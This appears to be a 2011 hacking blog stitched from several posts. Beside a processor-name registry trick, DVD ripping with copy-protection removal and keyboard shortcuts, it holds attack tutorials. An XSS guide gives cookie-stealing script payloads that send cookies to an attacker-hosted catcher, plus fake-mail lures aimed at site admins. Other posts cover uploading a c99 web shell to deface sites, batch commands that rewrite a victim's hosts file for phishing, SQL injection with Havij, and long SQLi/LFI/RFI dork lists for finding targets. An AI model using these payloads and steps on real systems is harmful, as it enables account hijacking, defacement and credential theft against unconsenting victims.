Thursday 6 October 2011

How to change the processor name




Hello friends  .......today i gonna show you that how can you change your processor name with the help of the registry editor.....

Steps - Open the notepad ....and type the following bold and underlined text....and save it as ....anyfilename.reg

here please check the extention to .reg file .......


Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]
"Component Information"=hex:00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00
"Identifier"="x86 Family 15 Model 1 Stepping 3"
"Configuration Data"=hex(9):ff,ff,ff,ff,ff,ff,ff,ff,00,00,00,00,00,00,00,00
"ProcessorNameString"="              AMD(R) ATHLON 64 BIT FX  8.70GHz"
"VendorIdentifier"="GenuineIntel"
"FeatureSet"=dword:00073fff
"~MHz"=dword:000006a3
"Update Signature"=hex:00,00,00,00,04,00,00,00
"Update Status"=dword:00000002









thanks/.....for reading this .....

Sunday 17 July 2011

XSS Tutorial








 








Hello Guys Today i will write a Complete Tutorial on XSS.

First Of All XSS is in 2 Types, Persistent and Non-Persistent type.

For XSS we will use something called a Cookie Catcher.
Question will be that why we would need someones else cookies?

The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking.

First go to a free hosting site like http://www.110mb.com or any other php hosting sites and register there. Then download this cookie catcher and upload it.

Cookie Catcher: http://adf.ly/1I5oz

What does the cookie catcher do?
It grabs the user's:
  • Cookies
  • IP
  • Referral Link. Which Page is attached to that Link
  • Time And Date

Get Vulnerable sites:

Ok first we need sites that are vulnerable to XSS so it will work on them.
To test it we will need to add a code after the link.
I will use this site that many of you probably saw it before.
http://adf.ly/Tdo3

Now for testing If a site is vulnerable or not you can add these codes:

Code:
"><script>alert(document.cookie)</script>

Code:
'><script>alert(document.cookie)</script>

Code:
"><script>alert("Test")</script>

Code:
'><script>alert("Test")</script>

Or a new one which i found out myself in which you can inject HTML:

Code:
"><body bgcolor="FF0000"></body>

Code:
"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>

Then if we see a java script popup like this:


Or if you used my testing and you saw the page's background go black or a page of google opens in that site it means its vulnerable to XSS attack.

In the end, if your site is http://www.example.com
The link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script>

Persistent XSS:

In this method we will grab the slave's cookies with no suspection and completely stealth.
Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.
Ok now lets go to this site: http://adf.ly/1I6ns
Now test and see if the XSS vulnerable test work on it.
It does!!! And your getting one of the vulnerability's symptoms. So now lets try to grab it's cookies. If there is a box to type or submit it, add this:

Code:
<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???
so they wont suspect you.

Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher.php search for cookies.html which is a new file that show you the cookies. Like if your cookie catcher link would be: http://www.example.com/cookie catcher.php
The container of the cookies would be: http://www.example.com/cookies.html

Now visit cookies.html and you would see the session of that cookie!

Now there is another way for a cookie grabbing drive by, add this code and post it:

Code:
<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie)</iframe>

Then post it in the forum or the comment box.
Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a

<iframe src="www.google.com"></iframe> and you will understand iframes more Smile

ofc the site Needs to have cookies supported! a blank javascript means you need to go to another site.

Non-Persistent XSS:

Ok in this method we will make the slave admin go to our link. First we will pick a XSS vulnerable site. For this method we will need a search.php which that page is vulnerable to XSS and has cookies in that page. In the vulnerable search.php in the textbox for the word to search for type:

Code:
<script>alert(document.cookie)</script>

And click the search button. If you see a javascript popup means its vulnerable to Non-Persistent XSS attack. Ok now we will do something similar.
I will use this link for this method: http://adf.ly/1I6ns
Now in front of the search.php?search= add this:

Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

Now go to http://www.spam.com and shrink the whole page's link. Try to find a site administrator's E-mail in that vulnerable website and send a Fake Mail from a online fake mailer like this one: http://adf.ly/1I73J

Now in the body just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the spam will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him.

Session Hijacking:

Ok now you have the Admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note open Notepad. The ; separates cookies from each other so first copy the code before the ; .
Now go in that vulnerable website and clear the link. Instead of that link add this:

Code:
Javascript:void(document.cookie="")

or for an example:

Code:
Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")

Then visit the link. Do this with all of the cookies and refresh the page. And you are logged in as administrator.
So now go in your Admin Panel and upload your Deface Page.

Good Luck. Now you have Hacked a Website with XSS.

High Compression 4GB DVD to 100MB File







  Install all the Softwares (Download them...all are freewares)……….
1) DivX Create Bundle
2) DVD2AVI
3) DVD Decrypter
4) LAME ACM Codec
5) Virtual Dub

 

Step (1): Insert your DVD into the drive and launch DVD decrypter. DVD Decrypter will detect the DVD and its file contents will now be displayed in the right pane. Now go to File > Browse and select the destination for the ripped VOB files. Keep in mind that the destination must have enough free space to store the contents of the entire DVD.

Step (2): After choosing the destination, click on File>Decrypt to start the decryption process. DVD Decrypter removes the Macrovision Protection by default, and you can set to remove region code as well by going to Tools > IFO > Region > Patch > Region Free. These are necessary for the next step. After the DVD ripping process is completed, close DVD Decrypter.

Step (3): Next Launch DVD2AVI. Go to File > Open. Make sure the correct track number in the Audio menu is selected. You need to find the correct track number-most DVDs have multiple audio tracks in different languages. This can be checked by selecting one track at a time and playing it. Also click on the Audio menu and navigate to “48>44.1KHz”, and select Off. Go to Help > SIMD Technology and select all the optimizations supported by your processor. Now go to File > Save As AVI.

Step (4): Decide on a file name and choose a location with enough free space. You will now be prompted to choose a video compressor. Choose “DivX 6.x.x” from the drop-down menu where you can select the video compressor.

Step (5): Under the Certification Profiles, you can choose an appropriate preset profile such as High Definition, Home Theatre, Portable, Handheld, and Unconstrained. When you choose one of the above profiles, it is virtually guaranteed that the encoded DivX file will be playable on any standalone DivX-certified player. Click on Settings. You can select a bitrate of your choice. A higher bitrate means a larger file size and better quality, while a lower bitrate means a smaller file size and lower image quality.

Step (6): In the Codec tab, you can set the Encoding mode. The default setting is a good trade-off between quality and compression, but if you wish to control the file size, you can state your own mode such as High Performance, Better Quality, etc. Click on OK and then on save to start the video
demultiplexing process. This will take some time depending on the speed of your computer. At the end of this process, you’ll have an AVI file and a WAV file.

Step (7): We now get to the creation of the DivX file-putting together the video (AVI) and audio (WAV) files that were created in the previous step. Launch Virtual Dub. Under File > Open, browse to the folder where the AVI and WAV files are stored. Select the AVI file and click Open.

Step (8): Click on the Audio menu and click “Full Processing Mode”. Click again on the Audio menu and select “WAV Audio”. You will be prompted to open a WAV file. Select the WAV file you created earlier and click Open. Click on the Audio menu and then on Compression. Select “MPEG Layer-3” from the left pane and then select “128 KBit/s, 48,000Hz, Streo” in the right pane. Click OK.

Step (9): Select Interleaving from the Audio menu. Then, select the “mis” radio button and input “500” into the “Interleave audio every” dialog box. Click OK. Again, in the Audio menu, select Volume. Check the box and move the slider to 200 percent. Click OK.

Step (10): From the Video menu, select Direct Stream Copy.

Step (11): Go to File > Save As. Enter a file name of your choice at a location of your choice, and click at a location of your choice, and click OK. This, again, will take some time, but not as much as the video encoding using DVD2AVI. After the process is complete, you’ll have a DivX backup of ypur DVD movie.
Step (12): All that’s left now is to burn the DivX backup up to CD or DVD using your DVD-Writer.



Wednesday 1 June 2011

Shell Uploading


What is Shell ?

A shell script is a script written for the shell, or command line interpreter, of an operating system. It is often considered a simple domain-specific programming language. Typical operations performed by shell scripts include file manipulation, program execution, and printing text.
This is a plain c99 shell, BUT it is Undetected so you should not get a warning from a anti virus if you download it. (update: not Undetected anymore )
I am not going to explain SQLi just how to deface.
Sql Tut- http://hackingmania.com/Blog/sql-injection-and-defacement-for-beginners-tutorial
So now go get yourself a vulnerable site, hack it and get the Admin Login details and get the Admin Page address.
Now login to the admin page with the admin details you got.
Go through the admin page until you find a place where you can upload a picture (Usually a picture).
Now you have to upload the shell. Right if you don’t get an error it is all good.
Now to find the shell
Go through the site until you find any image and if you are using firefox Right
- Click on it and “Copy Image Location”
Make a new tab and paste it there.
It will probably look something like this:
http://www.example.com/images/photonamehere.jpg
So now that we know that change “/photonamehere.jpg” to “/c99ud.php.jpg” (Without Qoutes)
Now a page will come up looking like this:

Does probably not look like that but will look similar.
Now you have access to all the files on the site
What you want to do is now,
Find index.php or whatever the main page is, and replace it with your HTML code for your Deface Page.
Then you can either delete all the other files OR (and I recommend this) Let it redirect to the main page.
Keep in mind:
• Change Admin Username and Password
•The people have FTP access so you need to change that Password too .
•Always use a Proxy or VPN

Desktop Phishing Hack


It is an advance form of phishing. Kindly read my previous post on normal phishing before proceeding.Difference between phishing and desktop phishing is as follows.

In phishing :-

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.

2.Victim enters his credentials in fake login page that goes to attacker.
3.Victim is then redirected to an error page or genuine website depending on attacker.

But main drawback in phishing is that victim can easily differentiate between fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.

In desktop phishing:-
1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.
2. Victim types  the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.
3. Rest of the things are same as in normal phishing.


What is Hosts File ?

The hosts file  is a text file containing domain names and IP address associated with them.
Location of hosts file in windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website, say www.anything.com , an query is sent to  Domain Name Server(DNS) to  look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would
be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.

What is attack ?
I hope you have got an idea that how modification of this hosts file on victim's computer can be misused. We  need to modify victim's hosts file by adding the genuine domain name and IP address of our fake website /phishing page. Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.

Two Steps to perform attack :-
1. Create and host phishing page on your computer.
2. Modify victim's host file

Step 1 -:

Since the webshosting sites like 110mb.com,ripway.com etc where we usually upload our phishing page do not provide a IP that points to your website like www.anything.110mb.com. An IP address points to a webserver and not a website. So we need to host the phishing page on our computer using a webserver software like wamp or xampp.
Kindly read my simple  tutorial on setting up XAMPP webserver here  and this step would be clear to you.

Step 2. This  step can performed in two different ways. 

Method 1 - Send victim a zip file containing modified host file . When Zip file would be clicked, It would automatically replace victim's orignal hosts file with modified hosts file.

Copy your hosts file and paste it anywhere . Modify it according to yourself..Edit it with any text editor and associate your public IP address with domain you wish as show.

Like in this case , when victim would visit gmail.com , he would be taken to website hosted on IP 'xxx.xxx.xxx.xxx'.Replace it with your public IP.Compress hosts file such that when victim opens it, it automatically gets copied to default location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.






Then you can bind this file with any exe ( using a binder or directly give it to victim. He is supposed to click it and you are done .

Method 2 - Create a batch file which would modify hosts file as per your need.
Open your notepad and type the following text

echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts 
Obviously replace it with your IP and website acc. to yourself.

Save file as 'all files' instead of txt files and name it anything.bat . Extension must be .bat 
When victim would run this file, a new entry will be made in hosts file.

You can test both the above methods to modify your own hosts file

Limitations of attack :-
1.Since our pubilc IP address is most probably dynamic that it gets changed everytime we disconnect and connect. To overcome this we need to purchase static IP from our ISP.
2. The browser may warn the victim that Digital Certificate of the website is not genuine.

Countermeasures:-
Never just blindly enter your credentials in a login page even if you yourself have typed a domain name in web browser. Check the protocol whether it is "http" or "https" . https is secure.

Saturday 5 March 2011

SQL Injection in Easy steps......!!!!!!

[SQL] HACK SITES USING Havij v1.14


it is simple tut how to use havij to hack sites Smile

Download Havij v1.14 


1.First Find a sqli infected site

2-Open havij and copy and paste infected link as shown in figure

3. Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx


4.Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed



5. After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure




6. In that Just put mark username and password and click "Get data"




8. Bingo Got now id and pass that may be admin...
The pass will get as md5 you can crack it also using this tool as shown in figure..



*************************************************************************
HOW TO FInD SQL VU SITES
GO HERE 

Quote:http://lnk.co/GP51L

THE GREEN COLLOUR MEAN there is SQL Injection Vulnerability

like this in the pic





SQL Dorks

Code:
Aqui les dejo unas cuantas Dorks para buscar webs vulnerables:

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:ageid=
inurl:games.php?id=
inurl:age.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:rtray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurlinions.php?id=
inurl:spr.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:articipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:rod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:erson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:rofile_view.php?id=
inurl:category.php?id=
inurl:ublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:rod_info.php?id=
inurl:shop.php?do=part&id=
inurl:roductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:roduit.php?id=
inurlp.php?id=
inurl:shopping.php?id=
inurl:roductdetail.php?id=
inurlst.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:age.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:roduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:ffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=


Friday 25 February 2011

Advance Dorks For LFI & RFI

Remote File Inclusion/Local File Inclusion:
inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.ru

allinurl:/index.php?file= site:*.ru

All INURL :


/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

LFI :
acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=

All keyboard Shortcuts

1.) Windows Hotkeys
Shift + F10 right-clicks.
Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.
Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.
Win + Control + F: Open Find dialog. (Computers)
Win + U: Open Utility Manager.
Win + F1: Open Windows help.
Win + Pause: Open System Properties dialog.
Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.
Win + Shift + Tab: Cycle through taskbar buttons in reverse.
Alt + Tab: Display CoolSwitch. More commonly known as the AltTab dialog.
Alt + Shift + Tab: Display CoolSwitch; go in reverse.
Alt + Escape: Send active window to the bottom of the z-order.
Alt + Shift + Escape: Activate the window at the bottom of the z-order.
Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.
Shift while a CD is loading: Bypass AutoPlay.
Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)
Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.
Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.
Printscreen: Copy screenshot of current screen to clipboard.
Alt + Printscreen: Copy screenshot of current active window to clipboard.
Ctrl + Alt + Down Arrow: Invert screen. Untested on OSes other than XP.
Ctrl + Alt + Up Arrow: Undo inversion.
Win + B : Move focus to systray icons.

2.) Generic
Ctrl + C or Ctrl + Insert: Copy.
Ctrl + X or Shift + Delete: Cut.
Ctrl + V or Shift + Insert: Paste/Move.
Ctrl + N: New... File, Tab, Entry, etc.
Ctrl + S: Save.
Ctrl + O: Open...
Ctrl + P: Print.
Ctrl + Z: Undo.
Ctrl + A: Select all.
Ctrl + F: Find...
Ctrl+W : to close the current window
Ctrl + F4: Close tab or child window.
F1: Open help.
F11: Toggle full screen mode.
Alt or F10: Activate menu bar.
Alt + Space: Display system menu. Same as clicking the icon on the titlebar.
Escape: Remove focus from current control/menu, or close dialog box.

3.) Generic Navigation
Tab: Forward one item.
Shift + Tab: Backward one item.
Ctrl + Tab: Cycle through tabs/child windows.
Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.
Enter: If a button's selected, click it, otherwise, click default button.
Space: Toggle items such as radio buttons or checkboxes.
Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item's name.
Ctrl + Left: Move cursor to the beginning of previous word.
Ctrl + Right: Move cursor to the beginning of next word.
Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in RichEdit controls.
Ctrl + Down: Move cursor to beginning of next paragraph.
Shift + Left: Highlight one character to the left.
Shift + Right: Highlight one character to the right.
Shift + Up: Highlight from current cursor position, to one line up.
Shift + Down: Highlight from current cursor position, to one line down.
Ctrl + Shift + Left: Highlight to beginning of previous word.
Ctrl + Shift + Right: Highlight to beginning of next word.
Ctrl + Shift + Up: Highlight to beginning of previous paragraph.
Ctrl + Shift + Down: Highlight to beginning of next paragraph.
Home: Move cursor to top of a scrollable control.
End: Move cursor to bottom of a scrollable control.

4.) Generic File Browser
Arrow Keys: Navigate.
Shift + Arrow Keys: Select multiple items.
Ctrl + Arrow Keys: Change focus without changing selection. "Focus" is the object that will run on Enter. Space toggles selection of the focused item.
(Letter): Select first found item that begins with (Letter).
BackSpace: Go up one level to the parent directory.
Alt + Left: Go back one folder.
Alt + Right: Go forward one folder.
Enter: Activate (Double-click) selected item(s).
Alt + Enter: View properties for selected item.
F2: Rename selected item(s).
Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one.
Delete: Delete selected item(s).
Shift + Delete: Delete selected item(s); bypass Recycle Bin.
Ctrl while dragging item(s): Copy.
Ctrl + Shift while dragging item(s): Create shortcut(s).
In tree pane, if any:
Left: Collapse the current selection if expanded, or select the parent folder.
Right: Expand the current selection if collapsed, or select the first subfolder.
NumpadAsterisk: Expand currently selected directory and all subdirectories. No undo.
NumpadPlus: Expand currently selected directory.
NumpadMinus: Collapse currently selected directory.

5.) Accessibility
Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled.
Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled.
Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled.
NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled.
Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled.
6.) Microsoft Natural Keyboard with IntelliType Software Installed
Win + L: Log off Windows.
Win + P: Open Print Manager.
Win + C: Open control panel.
Win + V: Open clipboard.
Win + K: Open keyboard properties.
Win + I: Open mouse properties.
Win + A: Open Accessibility properties.
Win + Space: Displays the list of Microsoft IntelliType shortcut keys.
Win + S: Toggle CapsLock on and off.

7.) Remote Desktop Connection Navigation



Ctrl + Alt + End: Open the NT Security dialog.
Alt + PageUp: Switch between programs.
Alt + PageDown: Switch between programs in reverse.
Alt + Insert: Cycle through the programs in most recently used order.
Alt + Home: Display start menu.
Ctrl + Alt + Break: Switch the client computer between a window and a full screen.
Alt + Delete: Display the Windows menu.
Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer.
Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.

8.) Mozilla Firefox Shortcuts
Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.
Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.
Ctrl + (1-9): Switch to tab corresponding to number.
Ctrl + N: New window.
Ctrl + T: New tab.
Ctrl + L or Alt + D or F6: Switch focus to location bar.
Ctrl + Enter: Open location in new tab.
Shift + Enter: Open location in new window.
Ctrl + K or Ctrl + E: Switch focus to search bar.
Ctrl + O: Open a local file.
Ctrl + W: Close tab, or window if there's only one tab open.
Ctrl + Shift + W: Close window.
Ctrl + S: Save page as a local file.
Ctrl + P: Print page.
Ctrl + F or F3: Open find toolbar.
Ctrl + G or F3: Find next...
Ctrl + Shift + G or Shift + F3: Find previous...
Ctrl + B or Ctrl + I: Open Bookmarks sidebar.
Ctrl + H: Open History sidebar.
Escape: Stop loading page.
Ctrl + R or F5: Reload current page.
Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.
Ctrl + U: View page source.
Ctrl + D: Bookmark current page.
Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.
Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.
Ctrl + Numpad0 or Ctrl + 0: Set text size to default.
Alt + Left or Backspace: Back.
Alt + Right or Shift + Backspace: Forward.
Alt + Home: Open home page.
